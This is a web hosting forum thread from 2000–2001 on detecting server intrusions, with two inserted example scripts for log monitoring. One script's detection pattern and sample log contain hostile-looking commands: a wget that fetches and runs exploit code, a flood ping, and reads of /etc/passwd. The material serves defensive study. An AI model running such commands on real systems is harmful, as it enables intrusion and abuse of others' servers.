
11-01-2000, 12:48 AM
Web Hosting Guru
Join Date: Jul 2000
Posts: 337

Just wondering what people do/use to monitor for illegal activity like users trying to hack/crack to gain root access to the server. Does anyone actually monitor, or do you just wait till it's happened and then fix it?
JFTR, I have a server and within the last 2 weeks it's been hit twice. Most likely by the same person(s), as the same user accounts have been created. It's quite aggravating, as I thought I had this system locked up pretty darn tight. It would be nice to have some sort of monitoring system to warn me when someone's on the system messing around...

11-01-2000, 01:11 AM
Community Guide
Join Date: Jun 2000
Location: Washington, USA
Posts: 5,978

Well, there are a lot of security apps; Tripwire is one of them, which you can find on http://freshmeat.net/
__________________
John T. Yocum -- Fluid Hosting
Shared - VPS - Dedicated - Colocation

11-01-2000, 01:17 AM
WHT Addict
Join Date: Oct 2000
Posts: 159

Hi everyone,
Please correct me if I'm wrong, but my knowledge of Tripwire is that it only notifies you *after* a compromise was made. IMHO, it's not very effective at deterring intruders; it's more a way of letting you know when your server was hacked into?
I'm also looking for a program which (hopefully) features intelligent detection and subsequent banning of users suspected of illegal activities against the server.
Anybody care to suggest whether such programs exist?

11-01-2000, 02:00 AM
Web Hosting Guru
Join Date: Oct 2000
Posts: 337

Unfortunately, most of the time, there *isn't* a way to catch a user before they compromise a system.
Let's face it, it's not like these people are typing "give me root access" at the prompt. Most exploits these days involve buffer overflows or other bad input checking by software running with privileges. You can't effectively monitor for intrusions via these methods, at least before it happens. What you can do is make sure that you've plugged up all known holes in your system.
Further complicating things is that anyone with root access can cover their tracks quite effectively. Remember, all data on the local system can be tampered with when a box is compromised, including monitoring and reporting systems.
There are a few things you can do in the way of monitoring, of course. You can filter and watch logs for repeated password failures, dumb users trying to su to root, etc. But ultimately, you will probably not know somebody has compromised your box until they have. That's where it's a must to have solid recovery procedures, and competent staff that can identify the exploit used and plug it up.

11-01-2000, 10:37 AM
Web Hosting Master
Join Date: Jun 2000
Location: Southern California
Posts: 12,121

I get a whole slew of anonymous FTP logins (anonymous FTP is not enabled on any domain). Every IP address on the machine is tried. I think someone mentioned that this is pretty common.
__________________
HostHideout.com - Where professionals discuss web hosting.
• Chicken

11-01-2000, 03:45 PM
Web Hosting Guru
Join Date: Oct 2000
Posts: 337

I see it all the time. Easy fix: turn off anonymous logins, or better yet, FTP if you don't need it.
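The log watching described a few posts up (repeated password failures, users trying to su to root) together with the anonymous FTP probing just discussed, as an added example that is not code from any poster in this thread: a POSIX shell script that reads syslog-style lines, counts the offenders and turns the sources over a threshold into a block list, which is the "detection and subsequent banning" the earlier question asked about. The log lines are constructed for the example, and the exact sshd, su and ftpd message wording, the threshold of 3 and the idea of feeding the result to ipchains/iptables or hosts.deny are assumptions; message formats differ between versions and distributions, so check your own /var/log/messages before trusting the grep patterns.

```shell
#!/bin/sh
# Added example for this thread, not code from any poster: pull repeated
# password failures, failed su-to-root attempts and anonymous FTP attempts
# out of syslog-style lines and turn the worst offenders into a block list.
# ASSUMPTIONS: the sshd/su/ftpd message formats below are constructed for the
# example and vary by version and distribution, so check the wording in your
# own /var/log/messages (or auth.log) before relying on the grep patterns.

# Constructed sample log: one source hammering root/admin, one stray failure,
# a user failing su twice, and one host probing anonymous FTP.
SAMPLE_LOG='Nov  1 00:12:01 host sshd[1201]: Failed password for root from 10.0.0.5 port 4011 ssh2
Nov  1 00:12:04 host sshd[1201]: Failed password for root from 10.0.0.5 port 4011 ssh2
Nov  1 00:12:09 host sshd[1203]: Failed password for admin from 10.0.0.5 port 4012 ssh2
Nov  1 00:12:15 host sshd[1205]: Failed password for bob from 192.0.2.20 port 1055 ssh2
Nov  1 00:12:20 host sshd[1203]: Failed password for root from 10.0.0.5 port 4012 ssh2
Nov  1 00:14:02 host su: FAILED SU (to root) bob on /dev/pts/1
Nov  1 00:14:30 host su: FAILED SU (to root) bob on /dev/pts/1
Nov  1 00:16:00 host ftpd[1402]: ANONYMOUS FTP LOGIN REFUSED FROM 10.0.0.9
Nov  1 00:16:01 host ftpd[1403]: ANONYMOUS FTP LOGIN REFUSED FROM 10.0.0.9
Nov  1 00:16:02 host ftpd[1404]: ANONYMOUS FTP LOGIN REFUSED FROM 10.0.0.9'

# "count ip" for every source with at least $1 failed passwords. Reads stdin.
failed_password_sources() {
    grep 'Failed password for' |
        awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' |
        sort | uniq -c |
        awk -v threshold="$1" '$1 >= threshold { print $1, $2 }'
}

# "count user" for every user who failed to su to root, most frequent first.
failed_su_to_root() {
    grep 'FAILED SU (to root)' |
        awk '{ print $(NF - 2) }' |
        sort | uniq -c | sort -k1,1nr -k2,2 |
        awk '{ print $1, $2 }'
}

# "count ip" for every source that tried an anonymous FTP login.
anonymous_ftp_sources() {
    grep 'ANONYMOUS FTP LOGIN REFUSED FROM' |
        awk '{ print $NF }' |
        sort | uniq -c | sort -k1,1nr -k2,2 |
        awk '{ print $1, $2 }'
}

# Addresses worth blocking: any source over the password-failure threshold $1.
# Handing these to ipchains/iptables or tcp_wrappers' hosts.deny is left to
# the admin (assumption: you block by source IP only). Blocking automatically
# can lock you out after a few typos from your own office or a shared proxy
# address, so whitelist those first.
ban_candidates() {
    failed_password_sources "$1" | awk '{ print $2 }'
}

# Stand-alone demo on the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | failed_password_sources 3
printf '%s\n' "$SAMPLE_LOG" | failed_su_to_root
printf '%s\n' "$SAMPLE_LOG" | anonymous_ftp_sources
printf '%s\n' "$SAMPLE_LOG" | ban_candidates 3
```

From cron you would run something like `failed_password_sources 5 < /var/log/messages` and mail anything it prints; the functions need the whole input before `sort` can count, so they suit a periodic sweep rather than `tail -f`. None of this contradicts the earlier reply: it catches noisy guessing and users fumbling with su, not a buffer overflow that gives root in one request, and once someone has root the log itself can be edited.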

11-02-2000, 02:22 AM
Web Hosting Master
Join Date: Jun 2000
Location: Southern California
Posts: 12,121

Yep, these are attempts. I don't turn on anon. FTP.
__________________
HostHideout.com - Where professionals discuss web hosting.
• Chicken

11-02-2000, 10:45 PM
Web Hosting Master
Join Date: Jun 2000
Location: Wichita, Ks, USA
Posts: 1,984

Red Hat is terrible about security.
The other day we put up a new box with no services running on it, and all of a sudden one of the techs noticed it was generating like 4.5 Mb/s of traffic, with nothing even on that box. It was crazy; I'm not sure what they found out the deal was.
__________________
affordablecolo.com carrier grade colocation at an affordable price!
Charles Baker - Company Operations
1-866-316-HOST

11-02-2000, 10:48 PM
Web Hosting Master
Join Date: May 2000
Posts: 587

Red Hat 6.2 and security freaks... go to http://www.openna.com/books/registration.htm and download a copy of the PDF of their book. It explains everything to do to secure a Red Hat system, including how to monitor logs, patch systems, monitor ports, everything.
It is very well written... and IT'S FREE! (I love Linux)
__________________
Félix C. Courtemanche · webmaster@can-host.com
Can-Host Networks · http://www.can-host.com
web«cp Control Panel · http://webcp.can-host.com

01-07-2001, 09:03 PM
WHT Addict
Join Date: Dec 2000
Location: Scotland
Posts: 123

In terms of monitoring users already on the servers (those that have telnet access), we use a modified version of bash that logs all their commands directly to a file, which is then grepped once a day for various suspect words, and anything interesting is mailed to the admins. We don't publicise the fact too much (not that we hide it either), so it hasn't put people off trying, but it's certainly helped us catch several people trying various exploits, trying to DoS from our servers, etc.
If anyone wants a copy, I can probably dig it out.
Regards,
Tony Lucas
__________________
Founder & SVP Product
Flexiant Ltd
Simplifying the Cloud - Designed for Service Providers
http://www.flexiant.com

01-07-2001, 09:08 PM
Junior Guru Wannabe
Join Date: Sep 2000
Posts: 99

I would love to have a copy. Please contact me about it.

01-08-2001, 12:21 AM
Web Hosting Master
Join Date: Sep 2000
Posts: 1,615

Please, me too. That sounds like a terrific add-on.

01-08-2001, 04:06 AM
Web Hosting Master
Join Date: Aug 2000
Posts: 2,750

Could I have a copy too, please?
__________________
The Php Support Desk
http://www.phpsupportdesk.com
Custom programming - kunal @ e-phoria.com
http://www.pingzine.com - Ping!Zine, the FREE, FRESH and EXCITING Web Hosting Magazine...

01-08-2001, 04:46 AM
WHT Addict
Join Date: Dec 2000
Location: Scotland
Posts: 123

It's at http://www.virtualhoster.co.uk/bash+xcal.tar.gz for those that are interested.
Logs to /var/log/.bashlogs.
I'll leave it up to you guys to write the cron scripts for it, as ours are integrated into other scripts.
Regards,
Tony Lucas
__________________
Founder & SVP Product
Flexiant Ltd
Simplifying the Cloud - Designed for Service Providers
http://www.flexiant.com
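The daily grep over the command log that the post above leaves to the reader, as an added example that is not part of the bash+xcal package or Tony's own cron scripts: a POSIX shell script that pulls lines matching a list of suspect words out of the log, counts them per user and mails (or prints) the report. The per-line format of the log ("user tty date time command"), the suspect-word list and the `mail` step are assumptions, as is the sample log, which is constructed for the example; check what the patched bash actually writes to /var/log/.bashlogs and adjust the awk field and patterns.

```shell
#!/bin/sh
# Added example, not part of the bash+xcal package above: the once-a-day
# grep over the command log that the post leaves to the reader.
# ASSUMPTIONS: the patched bash is assumed to write one line per command as
# "user tty date time command" to $BASHLOG; check the real format and adjust
# the awk field below. The suspect-word list is a starting point rather than
# a complete one, and gcc or wget are legitimate for many users, so expect
# to tune it to your own user base.

BASHLOG=${BASHLOG:-/var/log/.bashlogs}
ADMIN_MAIL=${ADMIN_MAIL:-}   # e.g. root; empty means print the report instead

# Words and fragments that deserve a second look, as one extended regex.
SUSPECT='wget |lynx -source|gcc |cc -o|chmod \+s|chmod 4755|ping -f|/etc/passwd|/etc/shadow|nmap |LD_PRELOAD'

# Constructed sample of one day's log (line format assumed, see above).
SAMPLE_BASHLOG='bob pts/1 Jan 7 21:05:12 ls -la
bob pts/1 Jan 7 21:05:40 wget http://192.0.2.7/x.c
bob pts/1 Jan 7 21:06:02 gcc -o x x.c
bob pts/1 Jan 7 21:06:10 ./x
carol pts/2 Jan 7 21:10:00 vi index.html
carol pts/2 Jan 7 21:11:30 ping -f 198.51.100.9
dave pts/3 Jan 7 21:20:01 cat /etc/passwd'

# Lines matching a suspect word. Reads stdin; exits 1 (grep's) when none match.
suspect_commands() {
    grep -E "$SUSPECT"
}

# "count user" for every user with suspect lines, most active first.
suspect_users() {
    suspect_commands | awk '{ print $1 }' | sort | uniq -c |
        sort -k1,1nr -k2,2 | awk '{ print $1, $2 }'
}

# Daily report for cron: mail the matching lines, or print them when no
# address is set. Returns 1 when there is nothing to report.
daily_report() {  # $1 = log file
    hits=$(suspect_commands < "$1") || return 1
    if [ -n "$ADMIN_MAIL" ]; then
        printf '%s\n' "$hits" | mail -s "suspect commands on $(hostname)" "$ADMIN_MAIL"
    else
        printf '%s\n' "$hits"
    fi
}

# Stand-alone demo on the constructed sample.
printf '%s\n' "$SAMPLE_BASHLOG" | suspect_commands
printf '%s\n' "$SAMPLE_BASHLOG" | suspect_users
```

Drop `daily_report /var/log/.bashlogs` (with `ADMIN_MAIL` set) into cron.daily and rotate the log afterwards. Two caveats a practitioner would want: the patched bash only records what that bash executes, so a user who starts another shell, or runs commands through perl or a script, leaves no trace unless those routes are restricted too; and, as the earlier reply in this thread points out, anyone who gets root can edit /var/log/.bashlogs, so mailing the report off the box at least preserves what was logged up to that point.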